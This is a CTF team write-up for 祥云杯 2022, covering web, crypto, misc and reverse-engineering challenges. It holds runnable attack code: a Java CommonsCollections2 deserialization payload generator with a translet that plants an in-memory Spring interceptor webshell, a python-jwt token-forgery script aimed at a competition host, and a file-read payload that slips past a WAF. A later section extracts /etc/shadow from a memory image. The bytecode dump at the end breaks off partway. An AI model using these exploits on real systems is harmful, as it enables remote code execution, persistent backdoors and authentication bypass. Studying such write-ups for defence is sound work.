祥云杯 2022 By W&M
WEB
ezjava
非预期直接CC2。打内存马
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.PriorityQueue;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.ibatis.javassist.ClassClassPath;
import org.apache.ibatis.javassist.ClassPool;
import org.apache.ibatis.javassist.CtClass;
/**
 * Payload generator from the write-up: serialises a {@link PriorityQueue} whose comparator is a
 * CommonsCollections4 {@code TransformingComparator} wrapping an
 * {@code InvokerTransformer("newTransformer")}, and whose first element is a {@code TemplatesImpl}
 * carrying the bytecode of class {@code g}. When such a stream is deserialised,
 * {@code PriorityQueue.readObject} re-heapifies and therefore calls the comparator, which invokes
 * {@code newTransformer()} on the TemplatesImpl and so defines and instantiates {@code g}
 * (the well-known "CC2" chain).
 *
 * <p>Defensive note: the receiving application is exposed only because it deserialises
 * attacker-controlled bytes with a plain {@code ObjectInputStream} while collections4 is on its
 * classpath. A {@code java.io.ObjectInputFilter} (JEP 290) that allow-lists the classes the
 * application actually expects, or not using Java serialisation for untrusted input at all, stops
 * this chain regardless of the gadget library version.
 */
public class CommonCollection2 {
    /**
     * Builds the gadget object graph and prints it as a single Base64 line on stdout.
     *
     * @param args unused
     * @throws Exception reflection or bytecode errors while assembling the graph; the
     *                   serialisation step itself is caught and printed below
     */
    public static void main(String[] args) throws Exception {
        // The String constructor is fetched reflectively and forced accessible (presumably not
        // public in this collections4 version); the imported type is only needed for the cast.
        Constructor constructor = Class.forName("org.apache.commons.collections4.functors.InvokerTransformer")
                .getDeclaredConstructor(String.class);
        constructor.setAccessible(true);
        // transform(obj) of this instance calls obj.newTransformer() reflectively.
        InvokerTransformer transformer = (InvokerTransformer) constructor.newInstance("newTransformer");
        // Javassist (the copy bundled with MyBatis) is used only to read g's class bytes from the
        // classpath. ClassPool.getDefault() returns a singleton, so the class path inserted on
        // `pool` is visible to the second getDefault() call two lines down.
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
        byte[] bytes = ClassPool.getDefault().get(g.class.getName()).toBytecode();
        byte[][] targetByteCodes = new byte[][]{bytes};
        // TemplatesImpl is populated purely through its private fields: the translet bytecode, a
        // non-null name, and _class left null so the class is (re)defined from _bytecodes the
        // first time newTransformer() runs.
        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        setFieldValue(templates, "_bytecodes", targetByteCodes);
        setFieldValue(templates, "_name", "name");
        setFieldValue(templates, "_class", null);
        TransformingComparator comparator = new TransformingComparator(transformer);
        // The queue is never used through its API: its private queue/size/comparator fields are
        // overwritten directly, so add() never runs the comparator in this JVM. size is set to 2
        // because heapify only compares elements when more than one is present.
        PriorityQueue queue = new PriorityQueue(1);
        Object[] queue_array = new Object[]{templates, 1};
        Field queue_field = Class.forName("java.util.PriorityQueue").getDeclaredField("queue");
        queue_field.setAccessible(true);
        queue_field.set(queue, queue_array);
        Field size = Class.forName("java.util.PriorityQueue").getDeclaredField("size");
        size.setAccessible(true);
        size.set(queue, 2);
        Field comparator_field = Class.forName("java.util.PriorityQueue").getDeclaredField("comparator");
        comparator_field.setAccessible(true);
        comparator_field.set(queue, comparator);
        try {
            /* ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("./cc2"));
            outputStream.writeObject(queue);
            outputStream.close();*/
            // Serialise into memory and emit one Base64 line. The earlier file-based variant
            // (above) and a local readObject self-test (below) are left commented out; the
            // self-test would trigger the chain inside this JVM.
            ByteArrayOutputStream btout = new ByteArrayOutputStream();
            ObjectOutputStream objOut = new ObjectOutputStream(btout);
            objOut.writeObject(queue);
            byte[] serialized = btout.toByteArray();
            System.out.println(Base64.getEncoder().encodeToString(serialized));
            //ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("./cc2"));
            //inputStream.readObject();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /**
     * Sets {@code fieldName} on {@code obj} by reflection, searching the class and its superclasses.
     *
     * @param obj       target instance
     * @param fieldName declared field name, e.g. {@code "_bytecodes"}
     * @param value     new value (may be {@code null})
     * @throws Exception {@link IllegalAccessException} from {@code Field.set}; note that
     *                   {@link #getField} returns {@code null} when no class in the hierarchy
     *                   declares the field, in which case the {@code field.set} call below fails
     *                   with a {@code NullPointerException} rather than a named lookup error
     */
    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }

    /**
     * Looks up a declared field by name, walking up the superclass chain, and makes it accessible.
     *
     * @param clazz     class to start the search from
     * @param fieldName declared field name
     * @return the accessible field, or {@code null} if no class in the chain declares it
     */
    public static Field getField(final Class<?> clazz, final String fieldName) {
        Field field = null;
        try {
            field = clazz.getDeclaredField(fieldName);
            field.setAccessible(true);
        } catch (NoSuchFieldException ex) {
            // Not declared here: retry on the parent (the recursive call handles setAccessible).
            if (clazz.getSuperclass() != null)
                field = getField(clazz.getSuperclass(), fieldName);
        }
        return field;
    }
}
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.springframework.util.Base64Utils;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.servlet.handler.AbstractHandlerMapping;
import java.io.IOException;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.ArrayList;
/**
 * Translet whose bytecode is embedded in the {@code TemplatesImpl} built by
 * {@code CommonCollection2}. Everything happens in the static initialiser, i.e. at the moment
 * {@code TemplatesImpl} defines and instantiates this class during deserialisation; the two
 * {@code transform} overrides are only the empty stubs {@link AbstractTranslet} requires.
 *
 * <p>What it installs is an in-memory Spring MVC interceptor: a class defined straight from bytes
 * into a live class loader and appended to the handler mapping's interceptor list, so it exists
 * nowhere on disk. For responders, an interceptor class on a handler mapping that no jar or class
 * file on the host contains is the artefact to look for; the fix belongs on the deserialisation
 * side (see {@code CommonCollection2}).
 */
public class g extends AbstractTranslet {
    // Runs once, when the class is initialised. Each checked exception is caught and printed
    // separately (Java 7 multi-catch would collapse these seven clauses); the stack trace goes
    // to the server's stderr and the chain otherwise fails silently.
    static {
        try {
            printName();
        } catch (NoSuchFieldException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {
            e.printStackTrace();
        } catch (InvocationTargetException e) {
            e.printStackTrace();
        } catch (NoSuchMethodException e) {
            e.printStackTrace();
        } catch (IllegalAccessException e) {
            e.printStackTrace();
        } catch (InstantiationException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    /**
     * Defines the embedded class {@code GuokeController} from Base64 bytes and registers an
     * instance of it with Spring MVC's request mapping. Despite its name it prints nothing.
     *
     * @throws NoSuchMethodException     if {@code ClassLoader.defineClass} cannot be located
     * @throws InvocationTargetException if {@code defineClass} itself throws
     * @throws IllegalAccessException    if reflection access is denied
     * @throws NoSuchFieldException      if {@code adaptedInterceptors} is not present on this
     *                                   Spring version
     * @throws ClassNotFoundException    if the just-defined class cannot be loaded back
     * @throws InstantiationException    if the defined class has no usable no-arg constructor
     * @throws IOException               declared for the decode step; not thrown by the visible code
     */
    public static void printName() throws NoSuchMethodException, InvocationTargetException, IllegalAccessException, NoSuchFieldException, ClassNotFoundException, InstantiationException, IOException {
        String className = "GuokeController";
        // Base64 of the class file for GuokeController (the blob itself has been elided from this
        // copy of the write-up).
        byte[] bytes = Base64Utils.decodeFromString("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");
        // bytecode of the controller
        // NOTE(review): this is the loader of the current thread's *class*, not
        // Thread.getContextClassLoader(); it only yields a usable application loader when the
        // request thread is a container-specific Thread subclass — TODO confirm against the target.
        ClassLoader classLoader = Thread.currentThread().getClass().getClassLoader();
        // The protected defineClass(String, byte[], int, int) is invoked reflectively so that no
        // custom ClassLoader subclass is needed.
        Method method = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
        method.setAccessible(true);
        method.invoke(classLoader, className, bytes, 0, bytes.length);
        // Scope 0 is RequestAttributes.SCOPE_REQUEST: DispatcherServlet exposes its
        // WebApplicationContext as a request attribute under this key, which is how the code gets
        // hold of the Spring context without any injection.
        WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
        AbstractHandlerMapping abstractHandlerMapping = (AbstractHandlerMapping) context.getBean("requestMappingHandlerMapping");
        // adaptedInterceptors is private and holds the interceptors consulted on every request;
        // appending to it registers the new class without any configuration change.
        Field field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
        field.setAccessible(true);
        ArrayList<Object> adaptedInterceptors = (ArrayList<Object>) field.get(abstractHandlerMapping);
        // loadClass resolves the class defined above in the same loader. The raw cast hides the
        // element type; presumably the elided class implements HandlerInterceptor — cannot be
        // verified from this copy.
        adaptedInterceptors.add(classLoader.loadClass(className).newInstance());
    }

    /** Required by AbstractTranslet; intentionally a no-op. */
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    /** Required by AbstractTranslet; intentionally a no-op. */
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }
}
FunWEB
jwt的一个cve
https://github.com/davedoesdev/python-jwt/blob/master/test/vulnerability_vows.py
import json
from json import loads, dumps
import requests
import re
from jwcrypto.common import base64url_decode, base64url_encode
# Log in with throwaway credentials to obtain a legitimately signed token. The request goes
# through a local proxy on 127.0.0.1:8080 (presumably the author's intercepting proxy; not
# needed for the request itself).
topic=requests.post(url="http://eci-2zegk71yvywhykjxwuv8.cloudeci1.ichunqiu.com/signin",proxies={"http":"http://127.0.0.1:8080"},headers = {'Content-Type': 'application/json'},data=json.dumps({"username":"1","password":"1"}))
# The token is issued as a cookie: pull "token=<value>;" out of the stringified headers dict
# (i.e. the Set-Cookie header). .group(1) raises AttributeError if no token was issued.
res=topic.headers
jwttoken=re.search("token=(.*?);",str(res),re.I|re.M).group(1)
# Compact JWS: header.payload.signature, each base64url-encoded.
[header, payload, signature] = jwttoken.split('.')
parsed_payload = loads(base64url_decode(payload))
# Claim to forge: is_admin. Re-encoded with compact separators (no spaces).
parsed_payload["is_admin"]=1
fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))
# JSON-serialised JWS in the shape of the linked python-jwt test: "protected"/"payload"/
# "signature" are the original, validly signed parts, while the extra leading key carries
# "<header>.<fake_payload>.". Which of the two payloads the vulnerable verifier ends up
# trusting is what that test demonstrates; the token is then swapped in for the real one.
token=('{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}')
print(token)
替换token
登录拿到flag
RustWaf
接受POST。然后通过rust-waf。返回值会经过json.parse。然后读文件
readfile随便post一个。
字符串不能包含flag和proc。并且会用rust的json去解析。
如果解析失败直接就返回字符串。然后再经过nodejs的js解析。
根据https://ctftime.org/writeup/35075
得到大致的payload
file[href]=a&file[origin]=a&file[protocol]=file:&file[hostname]=&file[pathname]=/app/fl%2561g.txt
大致可以想到。构造一个json字符串。让rust解析失败。返回字符串。再经过nodejs的json正常解析。
最后读取文件
{"href":"a","origin":"a","pathname":"/fl%61g","hostname":"","protocol":"file:","a":1e+5000000000000}
Crypto
tracing
正常的RSA,但是给了gcd的脚本运行过程,根据结果逆向回去得到phi
import re
# Registers reconstructed by replaying the gcd trace backwards; at the end `a` is used as
# phi and `b` as e (see the RSA step below). `s` is kept for parity with the traced script.
s = 0
a = 1
b = 0
# Number of "line 34" steps still waiting for their matching shift.
flag = 0
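def solve(cmd):
    """Replay one line of the gcd trace, in reverse, onto the global (a, b) pair.

    ``out.out`` records, per executed step, the source line ``(N)`` of the gcd
    script; the file is walked from last line to first, so each call undoes
    one step. Which line number means swap / shift / add was worked out by the
    author from the traced script and is not visible here, so the table below
    is kept exactly as given.

    Args:
        cmd: one raw trace line, e.g. ``"... (12) ...\\n"``. A line without a
            ``(N)`` token is ignored.

    Side effects:
        Updates the module globals ``a``, ``b`` and ``flag`` in place. ``flag``
        counts line-34 steps that still have to be paired with a shift at line
        10, 19 or 14 (presumably the halving steps of the gcd, seen in reverse).

    Raises:
        AssertionError: when the parity invariants checked after a step fail.
        SystemExit: on a line number missing from the table, after printing the
            offending line and ``ERROR``.
    """
    global a, b, flag
    # Raw string: "\(" is an invalid escape in a normal literal and warns on 3.12+.
    found = re.findall(r"\(\d+\)", cmd)
    if not found:
        return
    pos = int(found[0][1:-1])
    if pos in (12, 16, 21):
        a, b = b, a
    elif pos == 34:
        flag += 1
    elif pos == 10 and flag:
        a <<= 1
        flag -= 1
    elif pos == 19 and flag:
        a <<= 1
        flag -= 1
        assert a & 1 == 0
        assert b & 1 == 1
        assert flag == 0
    elif pos == 14 and flag:
        b <<= 1
        flag -= 1
        assert a & 1 == 1
        assert b & 1 == 0
        assert flag == 0
    elif pos == 9:
        a += b
        assert a & 1 == 1
        assert b & 1 == 1
        assert flag == 0
    elif pos in (11, 31, 8, 7, 6, 20, 18, 15, 5):
        pass  # lines that do not touch a or b
    else:
        print(pos, flag, cmd[:-1])
        print('ERROR')
        # Same effect as exit(0) without depending on the site-module builtin.
        raise SystemExit(0)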
# Read the recorded trace and replay it from its last line to its first.
with open("out.out", "r") as f:
    data = f.readlines()
for i in reversed(data):
    solve(i)
from Crypto.Util.number import *
# Challenge ciphertext and modulus.
c = 64885875317556090558238994066256805052213864161514435285748891561779867972960805879348109302233463726130814478875296026610171472811894585459078460333131491392347346367422276701128380739598873156279173639691126814411752657279838804780550186863637510445720206103962994087507407296814662270605713097055799853102
n = 113793513490894881175568252406666081108916791207947545198428641792768110581083359318482355485724476407204679171578376741972958506284872470096498674038813765700336353715590069074081309886710425934960057225969468061891326946398492194812594219890553185043390915509200930203655022420444027841986189782168065174301
# After the reverse replay the two registers hold the totient and the public exponent.
phi = a
e = b
d = inverse(e, phi)
m = pow(c, d, n)
flag = long_to_bytes(m)
print(flag)
fermat
obfuscate写了一大堆看不懂的东西,反正就是类似于在p的基础上加一个数得到q,本地测试之后发现A很小,直接费马分解做掉,x根据威尔逊定理选p-1即可
from Crypto.Util.number import *
from gmpy2 import *
# Public key, ciphertext and the two factors recovered by Fermat factorisation
# (p and q share their leading digits, so they are close to each other).
n = 141321067325716426375483506915224930097246865960474155069040176356860707435540270911081589751471783519639996589589495877214497196498978453005154272785048418715013714419926299248566038773669282170912502161620702945933984680880287757862837880474184004082619880793733517191297469980246315623924571332042031367393
c = 81368762831358980348757303940178994718818656679774450300533215016117959412236853310026456227434535301960147956843664862777300751319650636299943068620007067063945453310992828498083556205352025638600643137849563080996797888503027153527315524658003251767187427382796451974118362546507788854349086917112114926883
p = 11887853772894265642834649929578157180848240939084164222334476057487485972806971092902627112665734648016476153593841839977704512156756634066593725142934001
q = 11887853772894265642834649929578157180848240939084164222334476057487485972806971092902627112665734646483980612727952939084061619889139517526028673988305393
# x = p - 1, as chosen in the write-up; the assert is just Fermat's little theorem as a
# sanity check that p is prime-like.
x = p - 1
assert pow(114514, x, p) == 1
e = 65537
d = inverse(e, (p - 1) * (q - 1))
# Textbook RSA decryption, then undo the challenge's final masking step.
m = pow(c, d, n)
m ^= x ** 2
flag = long_to_bytes(m)
print(flag)
MISC
BearParser
虽然是私链,但是每个队伍部署的合约都一样,所以可以拿其他队伍做题的calldata重放到自己队伍部署的合约,蹭车。
-
在有其他队伍做出来题目后,爬取区块,找到做出来题目的队伍调用题目合约时传入的calldata,直接拿过来用。
// https://web3playground.io/ — connect MetaMask and run this in the browser (F12) console.
// Walks every mined block and prints "<height> <calldata>" for each transaction that carried
// input data and emitted at least one event log.
for (let height = 1; height < await web3.eth.getBlockNumber(); height++) {
    const block = await web3.eth.getBlock(height, true);
    for (const tx of block.transactions) {
        const receipt = await web3.eth.getTransactionReceipt(tx.hash);
        if (tx.input && tx.input != "0x" && receipt.logs[0]) {
            console.log("" + height + " " + tx.input);
        }
    }
}
190 0x26ad15930000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000008061616161616161616161616161616161616161616161616161616161616161616262626262626262626262626262626262626262626262626262626262626262000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000e0000000000000000000000000000000000000000000000000000000001111111100000000000000000000000000000000000000000000000000000000111111110000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000000278780000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000006fb9eccc000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000027878000000000000000000000000000000000000000000000000000000000000
-
remix ide新建一个空合约 必须有fallback函数 否则remix计算不出gas。编译,不需要部署
// Minimal contract used only so that Remix can estimate gas for a "low level interaction";
// it is compiled but never deployed (the real target is attached via "At Address").
contract xiangyun {
    // Accepts arbitrary calldata; the body is intentionally empty.
    fallback() external {}
}
-
部署页面 At Address添加题目部署的合约 下面Low level interactions直接把爬取到的calldata填进去 执行
把transaction hash填到题目里得到flag。
strange_forensics
下载了附件,同时根据题目描述得知,最终的flag由3段flag合起来,那么winhex打开搜了一下flag,发现有flag3的字眼,同时要符合题目描述说的最后带.
:
然后同样在winhex里面搜了一下镜像版本,发现是一个ubuntu18.04的系统:
那么就知道是一个linux的内存取证,但是profile需要自己制作。
参考这篇文章:https://www.modb.pro/db/225668 可知我们只需要把内核system.map文件和 module.dwarf文件打包成一个zip文件即可。
我们先下载了一个ubuntu18.04的虚拟机,查看内核发现刚好一模一样:
然后先下载了volatility,然后在/volatility/tools/linux 下执行make命令,即可得到module.dwarf(其中应该是会因为环境问题,有一些报错,是缺少部分环境,需自行去安装一下)
然后将上面得到的module.dwarf和system.map放在一起打包为ZIP文件,就是我们需要的profile文件:
然后再将制作好的ZIP文件放置volatility/plugins/overlays/linux/目录下,通过volatility --info查看,就可以看到我们配置好的profile文件了:
然后就是照例用linux_bash
看了下bash历史记录和linux_psaux
看了下进程和完整的命令行和开始时间:
通过linux_bash可以发现有个bob的用户:
通过linux_psaux可以看到最后有个/home/bob/Desktop/secret.zip
那么再使用linux_find_file列出这个文件,并尝试恢复文件:
python2.7 vol.py -f '/home/l1near/Desktop/1.mem' --profile=Linuxubuntu18_04x64 linux_find_file -F "/home/bob/Desktop/secret.zip"
python2.7 vol.py -f '/home/l1near/Desktop/1.mem' --profile=Linuxubuntu18_04x64 linux_find_file -i 0xffff97ce37a94568 -O /home/l1near/Desktop/secret.zip
提取出文件,发现文件打开报错,直接把数据区inflate也不对,所以怀疑是加密位出现了问题,修改了一下从00改成09,然后用archpr爆破可以得到密码为123456,从而得到flag2:flag2 is _y0u_Ar3_tHe_LIn
同样的操作,去找到并提取了/etc/shadow
文件
python2.7 vol.py -f '/home/l1near/Desktop/1.mem' --profile=Linuxubuntu18_04x64 linux_find_file -F "/etc/shadow"
python2.7 vol.py -f '/home/l1near/Desktop/1.mem' --profile=Linuxubuntu18_04x64 linux_find_file -i 0xffff97ce7444b448 -O /home/l1near/Desktop/shadow
找到bob用户的密码:
cmd5找了下,发现能解出来,即为flag1
最后3段拼一起即为最后的flag
lena
解混淆
得到二维码扫描得到flag
RE
engtom
题目给了一个snapshot,通过信息收集知道快照是jerryscript的字节码状态
git一份jerryscript项目下来,直接使用是不能dump出字节码的,我们需要在build时候设置一些参数
cmake . -DJERRY_SNAPSHOT_EXEC=ON -DJERRY_ERROR_MESSAGES=ON -DJERRY_DEBUGGER=ON -DJERRY_LINE_INFO=ON -DJERRY_PARSER_DUMP_BYTE_CODE=ON -DJERRY_REGEXP_DUMP_BYTE_CODE=ON -DJERRY_LOGGING=ON
得到编译好的jerry,带上参数dump字节码
./jerry --show-opcodes --exec-snapshot chall.snapshot
贴上字节码
Byte code dump:
Maximum stack depth: 38
Flags: [small_lit_enc]
Argument range end: 0
Register range end: 5
Identifier range end: 30
Const literal range end: 91
Literal range end: 101
0 : CBC_CHECK_VAR ident:5->string(SboxTable)
2 : CBC_CHECK_VAR ident:6->string(CK)
4 : CBC_CHECK_VAR ident:7->string(FK)
6 : CBC_CHECK_VAR ident:8->string(bigxor)
8 : CBC_CHECK_VAR ident:9->string(leftshift)
10 : CBC_CHECK_VAR ident:10->string(prefixInteger)
12 : CBC_CHECK_VAR ident:11->string(sm4Sbox)
14 : CBC_CHECK_VAR ident:12->string(GET_ULONG_BE)
16 : CBC_CHECK_VAR ident:13->string(PUT_ULONG_BE)
18 : CBC_CHECK_VAR ident:14->string(sm4_getkey)
20 : CBC_CHECK_VAR ident:15->string(encrypt)
22 : CBC_CHECK_VAR ident:16->string(decrypt_sm4)
24 : CBC_CHECK_VAR ident:17->string(compare_array)
26 : CBC_CHECK_VAR ident:18->string(input)
28 : CBC_CHECK_VAR ident:19->string(num)
30 : CBC_CHECK_VAR ident:20->string(message)
32 : CBC_CHECK_VAR ident:21->string(count)
34 : CBC_CHECK_VAR ident:22->string(pad_len)
36 : CBC_CREATE_VAR_EVAL ident:5->string(SboxTable)
38 : CBC_CREATE_VAR_EVAL ident:6->string(CK)
40 : CBC_CREATE_VAR_EVAL ident:7->string(FK)
42 : CBC_CREATE_VAR_FUNC_EVAL lit:91 ident:8->string(bigxor)
45 : CBC_CREATE_VAR_FUNC_EVAL lit:92 ident:9->string(leftshift)
48 : CBC_CREATE_VAR_FUNC_EVAL lit:93 ident:10->string(prefixInteger)
51 : CBC_CREATE_VAR_FUNC_EVAL lit:94 ident:11->string(sm4Sbox)
54 : CBC_CREATE_VAR_FUNC_EVAL lit:95 ident:12->string(GET_ULONG_BE)
57 : CBC_CREATE_VAR_FUNC_EVAL lit:96 ident:13->string(PUT_ULONG_BE)
60 : CBC_CREATE_VAR_FUNC_EVAL lit:97 ident:14->string(sm4_getkey)
63 : CBC_CREATE_VAR_FUNC_EVAL lit:98 ident:15->string(encrypt)
66 : CBC_CREATE_VAR_FUNC_EVAL lit:99 ident:16->string(decrypt_sm4)
69 : CBC_CREATE_VAR_FUNC_EVAL lit:100 ident:17->string(compare_array)
72 : CBC_CREATE_VAR_EVAL ident:18->string(input)
74 : CBC_CREATE_VAR_EVAL ident:19->string(num)
76 : CBC_CREATE_VAR_EVAL ident:20->string(message)
78 : CBC_CREATE_VAR_EVAL ident:21->string(count)
80 : CBC_CREATE_VAR_EVAL ident:22->string(pad_len)
82 : CBC_PUSH_LITERAL ident:23->string(Array)
84 : CBC_NEW0
85 : CBC_ASSIGN_SET_IDENT ident:5->string(SboxTable)
87 : CBC_PUSH_LITERAL_PUSH_NUMBER_0 ident:5->string(SboxTable)
89 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:214
92 : CBC_PUSH_NUMBER_POS_BYTE number:144
94 : CBC_PUSH_NUMBER_POS_BYTE number:233
96 : CBC_PUSH_NUMBER_POS_BYTE number:254
98 : CBC_PUSH_NUMBER_POS_BYTE number:204
100 : CBC_PUSH_NUMBER_POS_BYTE number:225
102 : CBC_PUSH_NUMBER_POS_BYTE number:61
104 : CBC_PUSH_NUMBER_POS_BYTE number:183
106 : CBC_PUSH_NUMBER_POS_BYTE number:22
108 : CBC_PUSH_NUMBER_POS_BYTE number:182
110 : CBC_PUSH_NUMBER_POS_BYTE number:20
112 : CBC_PUSH_NUMBER_POS_BYTE number:194
114 : CBC_PUSH_NUMBER_POS_BYTE number:40
116 : CBC_PUSH_NUMBER_POS_BYTE number:251
118 : CBC_PUSH_NUMBER_POS_BYTE number:44
120 : CBC_PUSH_NUMBER_POS_BYTE number:5
122 : CBC_NEW byte_arg:16
124 : CBC_ASSIGN_BLOCK
125 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:1
128 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:43
131 : CBC_PUSH_NUMBER_POS_BYTE number:103
133 : CBC_PUSH_NUMBER_POS_BYTE number:154
135 : CBC_PUSH_NUMBER_POS_BYTE number:118
137 : CBC_PUSH_NUMBER_POS_BYTE number:42
139 : CBC_PUSH_NUMBER_POS_BYTE number:190
141 : CBC_PUSH_NUMBER_POS_BYTE number:4
143 : CBC_PUSH_NUMBER_POS_BYTE number:195
145 : CBC_PUSH_NUMBER_POS_BYTE number:170
147 : CBC_PUSH_NUMBER_POS_BYTE number:68
149 : CBC_PUSH_NUMBER_POS_BYTE number:19
151 : CBC_PUSH_NUMBER_POS_BYTE number:38
153 : CBC_PUSH_NUMBER_POS_BYTE number:73
155 : CBC_PUSH_NUMBER_POS_BYTE number:134
157 : CBC_PUSH_NUMBER_POS_BYTE number:6
159 : CBC_PUSH_NUMBER_POS_BYTE number:153
161 : CBC_NEW byte_arg:16
163 : CBC_ASSIGN_BLOCK
164 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:2
167 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:156
170 : CBC_PUSH_NUMBER_POS_BYTE number:66
172 : CBC_PUSH_NUMBER_POS_BYTE number:80
174 : CBC_PUSH_NUMBER_POS_BYTE number:244
176 : CBC_PUSH_NUMBER_POS_BYTE number:145
178 : CBC_PUSH_NUMBER_POS_BYTE number:239
180 : CBC_PUSH_NUMBER_POS_BYTE number:152
182 : CBC_PUSH_NUMBER_POS_BYTE number:122
184 : CBC_PUSH_NUMBER_POS_BYTE number:51
186 : CBC_PUSH_NUMBER_POS_BYTE number:84
188 : CBC_PUSH_NUMBER_POS_BYTE number:11
190 : CBC_PUSH_NUMBER_POS_BYTE number:67
192 : CBC_PUSH_NUMBER_POS_BYTE number:237
194 : CBC_PUSH_NUMBER_POS_BYTE number:207
196 : CBC_PUSH_NUMBER_POS_BYTE number:172
198 : CBC_PUSH_NUMBER_POS_BYTE number:98
200 : CBC_NEW byte_arg:16
202 : CBC_ASSIGN_BLOCK
203 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:3
206 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:228
209 : CBC_PUSH_NUMBER_POS_BYTE number:179
211 : CBC_PUSH_NUMBER_POS_BYTE number:28
213 : CBC_PUSH_NUMBER_POS_BYTE number:169
215 : CBC_PUSH_NUMBER_POS_BYTE number:201
217 : CBC_PUSH_NUMBER_POS_BYTE number:8
219 : CBC_PUSH_NUMBER_POS_BYTE number:232
221 : CBC_PUSH_NUMBER_POS_BYTE number:149
223 : CBC_PUSH_NUMBER_POS_BYTE number:128
225 : CBC_PUSH_NUMBER_POS_BYTE number:223
227 : CBC_PUSH_NUMBER_POS_BYTE number:148
229 : CBC_PUSH_NUMBER_POS_BYTE number:250
231 : CBC_PUSH_NUMBER_POS_BYTE number:117
233 : CBC_PUSH_NUMBER_POS_BYTE number:143
235 : CBC_PUSH_NUMBER_POS_BYTE number:63
237 : CBC_PUSH_NUMBER_POS_BYTE number:166
239 : CBC_NEW byte_arg:16
241 : CBC_ASSIGN_BLOCK
242 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:4
245 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:71
248 : CBC_PUSH_NUMBER_POS_BYTE number:7
250 : CBC_PUSH_NUMBER_POS_BYTE number:167
252 : CBC_PUSH_NUMBER_POS_BYTE number:252
254 : CBC_PUSH_NUMBER_POS_BYTE number:243
256 : CBC_PUSH_NUMBER_POS_BYTE number:115
258 : CBC_PUSH_NUMBER_POS_BYTE number:23
260 : CBC_PUSH_NUMBER_POS_BYTE number:186
262 : CBC_PUSH_NUMBER_POS_BYTE number:131
264 : CBC_PUSH_NUMBER_POS_BYTE number:89
266 : CBC_PUSH_NUMBER_POS_BYTE number:60
268 : CBC_PUSH_NUMBER_POS_BYTE number:25
270 : CBC_PUSH_NUMBER_POS_BYTE number:230
272 : CBC_PUSH_NUMBER_POS_BYTE number:133
274 : CBC_PUSH_NUMBER_POS_BYTE number:79
276 : CBC_PUSH_NUMBER_POS_BYTE number:168
278 : CBC_NEW byte_arg:16
280 : CBC_ASSIGN_BLOCK
281 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:5
284 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:104
287 : CBC_PUSH_NUMBER_POS_BYTE number:107
289 : CBC_PUSH_NUMBER_POS_BYTE number:129
291 : CBC_PUSH_NUMBER_POS_BYTE number:178
293 : CBC_PUSH_NUMBER_POS_BYTE number:113
295 : CBC_PUSH_NUMBER_POS_BYTE number:100
297 : CBC_PUSH_NUMBER_POS_BYTE number:218
299 : CBC_PUSH_NUMBER_POS_BYTE number:139
301 : CBC_PUSH_NUMBER_POS_BYTE number:248
303 : CBC_PUSH_NUMBER_POS_BYTE number:235
305 : CBC_PUSH_NUMBER_POS_BYTE number:15
307 : CBC_PUSH_NUMBER_POS_BYTE number:75
309 : CBC_PUSH_NUMBER_POS_BYTE number:112
311 : CBC_PUSH_NUMBER_POS_BYTE number:86
